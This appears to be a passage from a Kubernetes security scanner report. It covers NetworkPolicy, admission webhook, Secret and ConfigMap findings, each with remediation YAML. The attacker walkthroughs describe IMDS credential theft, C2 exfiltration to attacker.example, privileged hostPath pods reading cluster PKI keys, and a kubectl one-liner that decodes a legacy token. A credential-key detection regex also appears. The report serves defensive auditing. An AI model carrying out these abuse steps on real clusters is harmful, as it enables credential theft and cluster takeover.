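apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-unmatched
  namespace: flat-network
spec:
  podSelector:
    matchLabels:
      app: orphan                 # matches the uncovered workload's labels
  policyTypes: [Ingress]
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app: frontend       # hypothetical upstream; replace with the real caller
      ports:
        - protocol: TCP
          port: 8080              # hypothetical application port
Egress allowances (DNS plus actual dependencies) follow the same pattern as the namespace-wide default-deny sketch earlier in this report.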
Evidence
Labels: app=orphan
Show raw JSON
{
  "labels": {
    "app": "orphan"
  }
}
MEDIUM

Namespace ingress-only controls ingress but has no Egress policy (one-way enforcement)

KUBE-NETPOL-COVERAGE-003 1 subject Score 5.8

Affected subject

MEDIUM Namespace/ingress-only/ingress-only Namespace 5.8
Namespace ingress-only controls ingress but has no Egress policy (one-way enforcement)
Scope · Namespace Namespace ingress-only: pods are firewalled inbound but can reach any outbound destination
Category: Lateral Movement Resource: Namespace/ingress-only/ingress-only Namespace: ingress-only

Namespace ingress-only has NetworkPolicy objects that select pods for ingress filtering but no NetworkPolicy enforces egress. In Kubernetes' policy model, ingress and egress are independent dimensions: a pod is isolated for ingress only if a policy with policyTypes: Ingress selects it, and isolated for egress only if a policy with policyTypes: Egress selects it. A pod can be tightly firewalled inbound and still reach the entire internet outbound, which is exactly the asymmetry seen here.

This is a classic misconfiguration after a half-finished zero-trust migration. Teams typically write ingress policies first because they think of "who can talk to my service," and ship without revisiting outbound. The result looks compliant in dashboards but leaves data exfiltration, cloud IMDS access, and outbound C2 wide open.

The practical risk is that egress is the dimension attackers actually want. Inbound restrictions help against external scanners, but a compromised pod's value to an attacker is in what it can talk *out* to: the cloud control plane via IMDS, attacker-controlled C2, internal databases in other namespaces, and the cluster's kube-apiserver.

Impact Compromised pods in this namespace retain full outbound reach. IMDS credential theft, C2 callbacks, and lateral pivots out of the namespace are unimpeded.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any pod in ingress-only.
  2. They hit IMDS. The namespace has no egress policy, so the request succeeds and node IAM credentials are exfiltrated.
  3. They establish C2 to attacker.example:443 and stream captured tokens, environment variables, and pod-mounted secrets.
  4. They pivot to other namespaces by talking to ClusterIP Services directly. The missing egress policy doesn't restrict cluster-internal destinations either.
  5. They call kube-apiserver with the pod's ServiceAccount token (egress to apiserver also unrestricted), enumerating RBAC for any privesc opportunity.
Remediation
Add a default-deny-egress NetworkPolicy in ingress-only, then explicit per-workload egress allowlists for DNS and actual outbound dependencies.
  1. Apply a default-deny-egress policy in ingress-only targeting podSelector: {} so every pod becomes egress-isolated (see the sketch after this list).
  2. Add an explicit DNS-allow policy (UDP/TCP 53 to kube-system).
  3. For each workload that has legitimate egress, add a tight to: clause (specific Service, namespaceSelector+podSelector, or specific external CIDR; never 0.0.0.0/0).
  4. Validate with kubectl exec into a representative pod, confirming that curl --max-time 3 https://example.com/ times out.
  5. Wire CI policy (Kyverno require-policytypes-egress) to fail any future namespace with ingress-only coverage.
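A minimal sketch of step 1; the namespace's existing ingress policies stay in force, this only adds the missing egress isolation:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-egress
  namespace: ingress-only
spec:
  podSelector: {}            # every pod in the namespace becomes egress-isolated
  policyTypes: [Egress]      # no egress rules listed = all outbound denied until allowlisted
The DNS and per-workload allowlists from steps 2-3 then reuse the egress pattern shown in the earlier namespace findings.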
Evidence
Namespace: ingress-only
Show raw JSON
{
  "namespace": "ingress-only"
}
MEDIUM

NetworkPolicy flat-network/allow-broad accepts ingress from any namespace via empty namespaceSelector

KUBE-NETPOL-WEAKNESS-001 1 subject Score 5.5
MITRE ATT&CK: T1046, T1018, T1090, T1078.004

Affected subject

MEDIUM NetworkPolicy/flat-network/allow-broad Object 5.5
NetworkPolicy flat-network/allow-broad accepts ingress from any namespace via empty namespaceSelector
Scope · Object NetworkPolicy flat-network/allow-broad: selected pods are reachable from every namespace, present and future
Category: Lateral Movement Resource: NetworkPolicy/flat-network/allow-broad Namespace: flat-network

NetworkPolicy flat-network/allow-broad contains an ingress from: peer with a namespaceSelector that has no matchLabels and no matchExpressions. In NetworkPolicy semantics this is the special form that means "every namespace in the cluster", which is exactly the opposite of the Kubernetes default for from: peers (which is "only the policy's own namespace").

In multi-tenant or shared clusters the impact is direct: namespace boundaries are the cheapest soft tenancy boundary Kubernetes offers, and namespaceSelector: {} invalidates that boundary for the selected pods. A compromised pod in any tenant (even one with no business need to talk to these pods) has unrestricted access on the allowed ports.

The correct pattern is to scope the namespaceSelector to the specific labels that identify allowed source namespaces (e.g., tenancy.example.com/team: data-platform) and combine it with an explicit podSelector so only the right pods in the right namespaces can connect. Combined selectors mean "pods matching label X in namespaces matching label Y": the AND form, not the OR form.

Impact Selected workloads are reachable from any pod in any namespace on the allowed ports. This defeats namespace-based tenant isolation and invites cross-tenant lateral movement.
How an attacker abuses this
  1. Attacker compromises a low-value pod in some other namespace (CI runner, stale demo, shared sidecar).
  2. They enumerate ClusterIP Services and notice the Service backing allow-broad's pods in flat-network.
  3. They attempt a TCP connect from the other namespace. Under any other policy this would be denied at the CNI, but namespaceSelector: {} matches and the connection succeeds.
  4. They exploit an application-layer issue on the now-reachable port (auth bypass, weak credential, RCE) and pivot into the high-value workload.
  5. They continue lateral motion from inside the target namespace using mounted tokens and secrets.
Remediation
Replace the empty namespaceSelector with explicit labels identifying the small set of namespaces that legitimately need access, paired with a podSelector.
  1. Identify which namespaces actually need to reach the selected pods (often one or two; never "all").
  2. Label those namespaces with a stable, policy-meaningful key (e.g., tenancy.example.com/team: data-platform).
  3. Edit allow-broad to replace namespaceSelector: {} with matchLabels for the chosen label, and add a sibling podSelector (see the fragment after this list).
  4. Validate by attempting connections from a netshoot pod in a non-allowed namespace (must time out) and from an allowed namespace (must succeed).
  5. Add a Kyverno or OPA Gatekeeper rule that warns on any new NetworkPolicy with an empty namespaceSelector peer.
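A sketch of the corrected spec.ingress fragment for steps 2-3, assuming source namespaces are labeled tenancy.example.com/team: data-platform and the allowed client pods carry app: api-client (both hypothetical labels; keep the policy's existing spec.podSelector and ports):
  ingress:
    - from:
        - namespaceSelector:              # only namespaces carrying the team label...
            matchLabels:
              tenancy.example.com/team: data-platform
          podSelector:                    # ...AND only pods with this label inside them
            matchLabels:
              app: api-client
Both selectors sit in the same from: element, so they combine as AND; listing them as two separate elements would be OR and re-open the policy.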
Evidence
Policy: allow-broad
Show raw JSON
{
  "policy": "allow-broad"
}

Admission Webhooks

3 findings · 3 rules · 0 critical · 1 high · 2 medium · 0 low
HIGH

MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local is fail-open (failurePolicy: Ignore) on security-critical resources

KUBE-ADMISSION-001 1 subject Score 7.9
MITRE ATT&CK: T1562, T1556, T1525, T1611

Affected subject

HIGH MutatingWebhookConfiguration/risky-ignore-webhook Cluster 7.9
MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local is fail-open (failurePolicy: Ignore) on security-critical resources
Scope · Cluster MutatingWebhookConfiguration risky-ignore-webhook (webhook entry mutate.vulnerable.local): applies to admission across the entire cluster
Category: Infrastructure Modification Resource: MutatingWebhookConfiguration/risky-ignore-webhook

The webhook mutate.vulnerable.local in MutatingWebhookConfiguration/risky-ignore-webhook intercepts create/update on security-critical resources (pods, deployments, daemonsets, statefulsets, jobs, cronjobs, or podtemplates) but its failurePolicy is set to Ignore. The Kubernetes admission docs are explicit: Ignore means "any error from the webhook is silently ignored, and the API request is allowed to continue". In practice, this means that if the webhook backend is unavailable, slow, or denies the request with an error, the offending pod/workload is admitted as if no policy existed.

Concretely, if the policy backend pod crashes, is mid-rollout, has a network partition, fails its own admission, or returns an HTTP 500, then any pod can ship. That includes pods that violate Pod Security Standards, run as root, mount the host filesystem, or use hostNetwork. Beyond that, an attacker who can already trigger a denial-of-service against the webhook backend (high traffic, OOM via large requests, killing its pods) can deliberately disable enforcement and then admit privileged pods.

The failurePolicy choice is one of two: Fail (deny when the webhook is unavailable: the conservative production default) or Ignore (allow when unavailable: only appropriate for non-security webhooks like cosmetic mutators). Security webhooks (PSA replacements, image signing, network-policy injection, secret encryption) should always use Fail paired with objectSelector/namespaceSelector carve-outs that ensure the policy backend itself can come up before any other workload is admitted.

Impact Any outage or DoS of the webhook backend silently disables policy enforcement cluster-wide on the targeted resources. Privileged pods, root containers, and PSS-violating workloads can be admitted while monitoring shows the webhook "installed."
How an attacker abuses this
  1. Attacker enumerates webhook configurations (kubectl get MutatingWebhookConfiguration) and identifies that risky-ignore-webhook has failurePolicy: Ignore.
  2. They induce backend failure: kill the webhook's backing pods if they have RBAC for it, send oversized AdmissionReview payloads to OOM the backend, or simply wait for a deploy-time outage.
  3. While the webhook is unhealthy, they apply a privileged pod manifest (hostPID, hostNetwork, hostPath /, runAsUser 0).
  4. The API server calls the webhook, gets a connection-refused/timeout error, applies Ignore, and admits the pod. There is no audit trail noting that the webhook was bypassed beyond the API-server logs (which most teams do not alert on).
  5. From the privileged pod the attacker pivots: chroot into /host for full node compromise, dump secrets, persist a daemonset.
Remediation
Switch mutate.vulnerable.local.failurePolicy to Fail and confirm the webhook backend has the availability/HA characteristics needed for the cluster's admission rate.
  1. Edit MutatingWebhookConfiguration/risky-ignore-webhook and set webhooks[name=mutate.vulnerable.local].failurePolicy: Fail (see the fragment after this list).
  2. Make sure the webhook backend is highly available (≥2 replicas, PodDisruptionBudget, anti-affinity, dedicated nodepool if it is on the critical admission path).
  3. Add a namespaceSelector carve-out so the webhook does not fight itself during cold start (e.g., exclude the namespace where the webhook backend runs).
  4. Add a SLO/alert for AdmissionReview latency and 5xx rate; failure-mode is now "deploys halt" instead of "policy silently disabled," which is preferable but needs visible monitoring.
  5. Consider migrating PSS-style enforcement to the in-tree Pod Security Admission so you have a non-webhook backstop that remains active even if the webhook fails to come up.
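A sketch of the edited webhook entry covering steps 1 and 3; policy-system is a hypothetical namespace for the webhook backend, and the untouched fields are elided:
webhooks:
  - name: mutate.vulnerable.local
    failurePolicy: Fail                      # an unreachable backend now denies admission instead of waving requests through
    namespaceSelector:
      matchExpressions:
        - key: kubernetes.io/metadata.name
          operator: NotIn
          values: [policy-system]            # hypothetical backend namespace, exempted so the webhook can bootstrap itself
    # rules, clientConfig, sideEffects, admissionReviewVersions: unchanged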
Evidence
failurePolicy: Ignore
Webhook failures are silently ignored and the request is allowed (admission policy effectively off)
Webhook rules
CREATE on core/v1:pods (*)
Show raw JSON
{
  "failurePolicy": "Ignore",
  "rules": [
    {
      "apiGroups": [
        ""
      ],
      "apiVersions": [
        "v1"
      ],
      "operations": [
        "CREATE"
      ],
      "resources": [
        "pods"
      ],
      "scope": "*"
    }
  ]
}
MEDIUM

MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local exempts sensitive system namespaces via namespaceSelector

KUBE-ADMISSION-003 1 subject Score 6.4
MITRE ATT&CK: T1562, T1611, T1578

Affected subject

MEDIUM MutatingWebhookConfiguration/risky-ignore-webhook Cluster 6.4
MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local exempts sensitive system namespaces via namespaceSelector
Scope · Cluster MutatingWebhookConfiguration risky-ignore-webhook (webhook entry mutate.vulnerable.local): applies to admission across the entire cluster
Category: Infrastructure Modification Resource: MutatingWebhookConfiguration/risky-ignore-webhook

Webhook mutate.vulnerable.local in MutatingWebhookConfiguration/risky-ignore-webhook has a namespaceSelector that uses NotIn or DoesNotExist to exempt kube-system (or another *-system namespace) from admission control. The exemption is sometimes a deliberate cold-start workaround (the webhook backend itself runs in kube-system and would deadlock if the webhook applied to it), but it routinely outlives the cold-start need and is rarely revisited.

Sensitive namespaces are exactly where admission control matters most. kube-system hosts coredns, kube-proxy, the cloud-controller-manager, CNI agents, the metrics-server, and most clusters' add-on operators: workloads that already run with high privilege. An attacker who can create resources in kube-system (e.g., via a stolen system: ServiceAccount token, an over-permissive roles/clusterroles create rule, or a privileged operator) finds the admission webhooks deliberately turned off for them.

This is also a defense-in-depth gap: even if a future privesc finding (KUBE-PRIVESC-*) is mitigated, the namespace-selector exemption keeps the door open. The right pattern is to scope the exemption to the *single* control-plane namespace the backend itself needs (and only at boot), not to every -system namespace by suffix.

Impact An attacker who can create pods or other resources in the exempted system namespace bypasses every check this webhook implements: root containers, hostPath mounts, and arbitrary images all admit silently.
How an attacker abuses this
  1. Attacker compromises a workload with create pods permission scoped to kube-system (typical of operators, addon managers, or stolen control-plane tokens).
  2. They submit a pod manifest with hostPath: /, runAsUser: 0, and securityContext.privileged: true.
  3. The API server evaluates mutate.vulnerable.local's namespaceSelector, sees the exemption for kube-system, and admits the pod without invoking the webhook.
  4. The pod schedules on a control-plane-adjacent node, mounts the host root filesystem, and reads /etc/kubernetes/pki/* (etcd CA, apiserver cert, kubelet client cert).
  5. With those keys the attacker forges admin credentials and assumes full cluster control.
Remediation
Narrow mutate.vulnerable.local.namespaceSelector to the exact namespace the webhook backend needs to skip during cold start, or remove the exemption entirely once the backend is bootstrapped.
  1. Check why mutate.vulnerable.local excludes the namespace. Is it a cold-start workaround or a permanent carve-out?
  2. If cold-start: scope the exemption to the *exact* namespace the webhook backend runs in (e.g., kubernetes.io/metadata.name NotIn [policy-system]), not every *-system.
  3. If permanent carve-out: replace it with the in-tree Pod Security Admission level for that namespace so privileged pods still face *some* check (see the sketch after this list).
  4. Validate by dry-running a privileged pod manifest in the previously-exempted namespace; the webhook should now process the request.
  5. Wire a Kyverno or OPA Gatekeeper rule that fails any future webhook configuration that exempts kube-system or a *-system namespace without a documented justification annotation.
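If the carve-out turns out to be permanent (step 3), a sketch of giving the exempted namespace at least the in-tree Pod Security Admission checks; baseline in warn/audit mode is an assumption, since an enforce label would likely block existing kube-system add-ons:
apiVersion: v1
kind: Namespace
metadata:
  name: kube-system
  labels:
    pod-security.kubernetes.io/warn: baseline     # surfaces violations at admission time without blocking
    pod-security.kubernetes.io/audit: baseline    # records violations in the audit log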
Evidence
namespaceSelector
label kubernetes.io/metadata.name is NOT one of [kube-system]
Show raw JSON
{
  "namespaceSelector": {
    "matchExpressions": [
      {
        "key": "kubernetes.io/metadata.name",
        "operator": "NotIn",
        "values": [
          "kube-system"
        ]
      }
    ]
  }
}
MEDIUM

MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local can be bypassed by omitting the workload-controlled labels in objectSelector

KUBE-ADMISSION-002 1 subject Score 6.1
MITRE ATT&CK: T1562, T1556, T1578

Affected subject

MEDIUM MutatingWebhookConfiguration/risky-ignore-webhook Cluster 6.1
MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local can be bypassed by omitting the workload-controlled labels in objectSelector
Scope · Cluster MutatingWebhookConfiguration risky-ignore-webhook (webhook entry mutate.vulnerable.local): applies to admission across the entire cluster
Category: Infrastructure Modification Resource: MutatingWebhookConfiguration/risky-ignore-webhook

Webhook mutate.vulnerable.local in MutatingWebhookConfiguration/risky-ignore-webhook uses an objectSelector, which limits its admission rules to objects whose own labels match the selector. Because Kubernetes lets the workload author set arbitrary labels on the object they are creating, an objectSelector that gates security policy is opt-in: an attacker (or a careless developer) creates the same pod without the matching labels and the webhook never sees it.

This is structurally different from namespaceSelector (which gates by namespace labels; namespaces are a higher-trust object that workload authors typically can't relabel). objectSelector checks the labels on the resource being admitted, so a pod manifest that simply omits the policy's gating label slips past untouched. The Kubernetes API reference itself warns that objectSelector should only be used for opt-in webhooks, because end users can skip the webhook by controlling the labels on their own objects.

For policy-enforcing webhooks (PSS replacements, image-signing, sidecar injection of security tooling) this is the wrong tool. The right pattern is to inversely scope the webhook: select *all* objects (objectSelector: {} or absent) and use a namespaceSelector plus carefully targeted opt-out labels (e.g., policy.example.com/exempt: true) that are themselves gated by RBAC on the namespace, not on the pod author.

Impact Workload authors (legitimate or hostile) can opt out of admission enforcement simply by not setting the gating labels on their pods. This defeats the point of the webhook for any user with create permission on the targeted resources.
How an attacker abuses this
  1. Attacker reads MutatingWebhookConfiguration/risky-ignore-webhook and notes the objectSelector only matches objects labeled admission: enabled.
  2. They author a pod manifest that omits the admission label entirely.
  3. They kubectl apply it; the API server evaluates the objectSelector, finds it does not match, skips the webhook, and admits the pod.
  4. The pod runs with whatever the namespace defaults allow, including PSS-violating settings the webhook was supposed to block.
  5. Because nothing logs "webhook skipped due to objectSelector," the bypass is invisible in the SIEM unless the team explicitly audits AdmissionReview misses.
Remediation
Replace objectSelector-based gating on mutate.vulnerable.local with namespaceSelector plus an RBAC-protected exemption label, or remove the selector and let the webhook see every object.
  1. Audit what mutate.vulnerable.local is trying to gate. If the goal is "only apply to pods in tenant namespaces," use namespaceSelector (namespace labels are higher-trust).
  2. If you need an exemption mechanism, add a policy.example.com/exempt: true label *on the namespace* and protect it with RBAC so workload authors cannot grant their own exemption.
  3. Edit MutatingWebhookConfiguration/risky-ignore-webhook and either drop webhooks[name=mutate.vulnerable.local].objectSelector or invert it to a default-on form (see the fragment after this list).
  4. Re-test by attempting to create a pod that previously bypassed admission; it should now be evaluated.
  5. If the webhook ships with the cluster's admission stack, document the new exemption flow so platform users know how to request one.
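A sketch of the default-on form from step 3: the objectSelector is dropped and the opt-out moves to an RBAC-protected namespace label (policy.example.com/exempt is a hypothetical key):
webhooks:
  - name: mutate.vulnerable.local
    # objectSelector removed: every object in in-scope namespaces is evaluated
    namespaceSelector:
      matchExpressions:
        - key: policy.example.com/exempt       # exemption lives on the Namespace, not on the pod author
          operator: NotIn
          values: ["true"]
NotIn also matches namespaces that lack the label entirely, so coverage is on by default and exemption requires someone with RBAC on the namespace to label it.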
Evidence
objectSelector
label admission = enabled
Show raw JSON
{
  "objectSelector": {
    "matchLabels": {
      "admission": "enabled"
    }
  }
}

Secrets & ConfigMaps

2 findings · 2 rules · 0 critical · 1 high · 1 medium · 0 low
HIGH

Secret vulnerable/legacy-token is a long-lived kubernetes.io/service-account-token (legacy, no expiry)

KUBE-SECRETS-001 1 subject Score 7.8

Affected subject

HIGH Secret/vulnerable/legacy-token Object 7.8
Secret vulnerable/legacy-token is a long-lived kubernetes.io/service-account-token (legacy, no expiry)
Scope · Object Secret vulnerable/legacy-token: credential is valid until manually deleted; readable by any subject with get/list secrets in vulnerable
Category: Data Exfiltration Resource: Secret/vulnerable/legacy-token Namespace: vulnerable

Secret vulnerable/legacy-token has type kubernetes.io/service-account-token. This is the legacy ServiceAccount token model: the token-controller persists a JWT into a Secret, the token has *no expiry* (the audience is the API server, the validity is open-ended), and it is readable by any subject with get/list secrets permission in the namespace.

Since Kubernetes v1.22, Bound ServiceAccount Tokens (KEP-1205) replaced this model: the kubelet projects a *new* token into the pod's filesystem with a short TTL (default 1h) and the token is bound to the pod object, so deleting the pod invalidates the token. v1.24 stopped auto-creating these legacy Secret tokens, and v1.28 introduced the LegacyServiceAccountTokenCleaner controller (on by default since v1.29) that removes unused ones automatically. A legacy token Secret today is either an artifact of a pre-1.24 cluster, a manually-created serviceAccountToken Secret, or a controller that explicitly created one. None of these carry the bind-to-pod, time-bounded properties of projected tokens.

The risk profile: a leaked legacy token grants whatever permissions its ServiceAccount has, *forever*, with no automatic revocation. It survives pod restarts and node reboots, and it stays valid until the Secret (or the ServiceAccount it belongs to) is deleted. Detection of misuse requires explicit audit-log monitoring against the SA name; rotation requires deleting the Secret and reissuing.

Impact Anyone who exfiltrates this Secret holds a non-expiring credential with the ServiceAccount's full RBAC; rotation requires manual kubectl delete secret and re-issue, and there is no time-based mitigation.
How an attacker abuses this
Background
ResourceSecret

A Secret holds sensitive data: registry pull credentials, TLS private keys, ServiceAccount tokens. Secrets are base64-encoded, not encrypted by default. Anyone with get on the Secret resource can read the contents in cleartext. get/list/watch on Secrets in kube-system is effectively cluster-admin: that namespace holds the controller-manager and kube-scheduler tokens.

Kubernetes docs ↗
  1. Attacker compromises any subject with get secrets in vulnerable (e.g., a forgotten view-style role, an over-permissive ConfigMap-reader role that wildcards resources, or a pod token with secret-read).
  2. They kubectl get secret legacy-token -n vulnerable -o jsonpath='{.data.token}' | base64 -d and obtain the raw JWT.
  3. They use the token against the kube-apiserver from outside the cluster (kubectl --token=...). No pod, no node, no IMDS hop required.
  4. Because the token has no exp claim and is not bound to a Pod object, it remains valid weeks or months later. Rotation during incident response is manual: delete the Secret and recreate it, and any cached copies the attacker holds are *still valid until that delete*.
  5. Attacker uses the SA's RBAC to read other Secrets, list pods cluster-wide (if SA has it), exec into pods, or escalate via any of the privesc paths the SA enables.
Remediation
Migrate the consumer of vulnerable/legacy-token to a projected ServiceAccount token, then delete the Secret. Enable LegacyServiceAccountTokenCleaner on the cluster.
  1. Identify what reads vulnerable/legacy-token: kubectl get pods -A -o json | jq '.items[] | select(.spec.volumes[]?.secret.secretName == "legacy-token") | .metadata.namespace + "/" + .metadata.name'. Also check Jobs, CronJobs, and external systems that might have copied the token out.
  2. Migrate each consumer to a projected SA token (serviceAccountToken projection in volumes) with a sensible expirationSeconds (e.g., 3600). The kubelet will refresh it automatically (see the sketch after this list).
  3. For external consumers (CI runners, dashboards) that need a long-lived token, use TokenRequest API on demand instead of a stored Secret, or rotate via a sealed-secret / external-secret-store flow.
  4. kubectl delete secret legacy-token -n vulnerable once consumers are migrated. Confirm no pod has a CrashLoopBackOff that mentions the missing token.
  5. Enable the LegacyServiceAccountTokenCleaner (default on v1.29+) so future stragglers get garbage-collected after their last-used timestamp ages out.
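A sketch of step 2, a pod consuming a projected ServiceAccount token in place of the legacy Secret (pod name, image, and ServiceAccount are hypothetical placeholders):
apiVersion: v1
kind: Pod
metadata:
  name: token-consumer                       # hypothetical consumer
  namespace: vulnerable
spec:
  serviceAccountName: default                # hypothetical; use the SA the legacy Secret belonged to
  containers:
    - name: app
      image: registry.example.com/app:latest # hypothetical image
      volumeMounts:
        - name: sa-token
          mountPath: /var/run/secrets/tokens
          readOnly: true
  volumes:
    - name: sa-token
      projected:
        sources:
          - serviceAccountToken:
              path: token                    # token appears at /var/run/secrets/tokens/token
              expirationSeconds: 3600        # short-lived; the kubelet refreshes it before expiry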
Evidence
Type: kubernetes.io/service-account-token
Long-lived ServiceAccount token (whoever holds it can act as the SA)
Show raw JSON
{
  "type": "kubernetes.io/service-account-token"
}
MEDIUM

ConfigMap vulnerable/app-config exposes credential-shaped keys (api_token, db_password) in plaintext

KUBE-CONFIGMAP-001 1 subject Score 6.3

Affected subject

MEDIUM ConfigMap/vulnerable/app-config Object 6.3
ConfigMap vulnerable/app-config exposes credential-shaped keys (api_token, db_password) in plaintext
Scope · Object ConfigMap vulnerable/app-config: readable by every subject with get configmaps in vulnerable, ships unencrypted in etcd, surfaces in kubectl describe and audit logs
Category: Data Exfiltration Resource: ConfigMap/vulnerable/app-config Namespace: vulnerable

ConfigMap vulnerable/app-config contains keys with names matching credential-like patterns: api_token, db_password. The Kubernetes API treats ConfigMaps as non-sensitive: etcd stores them unencrypted by default (encryption-at-rest is opt-in and almost always limited to Secrets), kubectl describe configmap prints values inline, audit logs include the data on get/list, and RBAC defaults give workload service accounts much wider read on ConfigMaps than on Secrets.

Storing a credential in a ConfigMap therefore violates the basic Kubernetes data-classification model in three ways simultaneously: (1) it appears in plaintext to anyone with get configmaps (a much larger set of subjects than get secrets); (2) it ends up in cluster backups, etcd dumps, and platform observability tooling that explicitly excludes Secrets; (3) it does not benefit from any of the surface area Kubernetes builds around Secrets (envelope encryption, file-mode 0600 projection, KMS provider, External Secrets Operator).

The matched keys are heuristic (a pattern like key also matches apiKey and public_key), so review is required before assuming compromise. In practice the pattern is strong: in production clusters this finding correlates with real leaks the majority of the time. Treat the values as exposed until proven otherwise.

Impact If any of the flagged keys (api_token, db_password) actually hold a credential, that credential is exposed to a wide audience: every workload SA in vulnerable, every backup operator, every audit log consumer, and possibly cluster-mirroring tooling.
How an attacker abuses this
Background
ResourceConfigMap

A ConfigMap stores plain-text configuration that pods read at startup. They are not meant to hold secrets, but in practice teams put database URLs (with passwords), API keys, and tokens in ConfigMaps. Kubesplaining flags credential-shaped keys for that reason.

  1. Attacker compromises a workload in vulnerable whose ServiceAccount has get configmaps (the typical default view role grants it).
  2. They kubectl get cm app-config -n vulnerable -o yaml and read the matched keys directly. No decoding needed since ConfigMap data is plaintext.
  3. They identify the credential class (DB connection string, API key, OAuth client_secret, signing key) from the key name and value shape.
  4. They use the credential immediately: DB connection strings often grant the same write permission the application has; API keys often have no IP restriction; client_secrets unlock the upstream identity provider.
  5. Because audit-log review on ConfigMaps is rare, the read goes unnoticed until the upstream credential is rotated for unrelated reasons.
Remediation
Move the credential out of vulnerable/app-config into a Kubernetes Secret (or, better, an external secret store) and remove the keys from the ConfigMap.
  1. Inspect each matched key (api_token, db_password) to confirm whether it is a real credential. Some keys like cache_key_prefix are false positives.
  2. For real credentials, create a Secret in vulnerable and update consumers (envFrom or volume mounts) to read from the Secret (see the sketch after this list).
  3. Rotate the credential at its source: if it was already in plaintext in a ConfigMap, treat it as compromised (assume any subject with view-on-configmaps had access).
  4. Remove the credential keys from vulnerable/app-config. Verify the consumer still works (kubectl rollout status).
  5. Wire prevention: a Kyverno cluster policy that warns on ConfigMap.data keys matching password|secret|token|credential|api_?key|access_?key|client_secret|connection_string|dsn. Pair with External Secrets Operator so the right path of least resistance is to use a real secret store.
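A sketch of step 2, moving the flagged keys into a Secret (the Secret name and values are placeholders; rotate the real credentials first):
apiVersion: v1
kind: Secret
metadata:
  name: app-credentials          # hypothetical name
  namespace: vulnerable
type: Opaque
stringData:                      # stringData accepts plain strings; the API server base64-encodes on write
  api_token: "<rotated value>"   # never reuse the value that sat in the ConfigMap
  db_password: "<rotated value>"
Consumers then reference it with envFrom: secretRef (or a volume mount) alongside the trimmed app-config ConfigMap.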
Evidence
Matched keys: api_token, db_password
Show raw JSON
{
  "matched_keys": [
    "api_token",
    "db_password"
  ]
}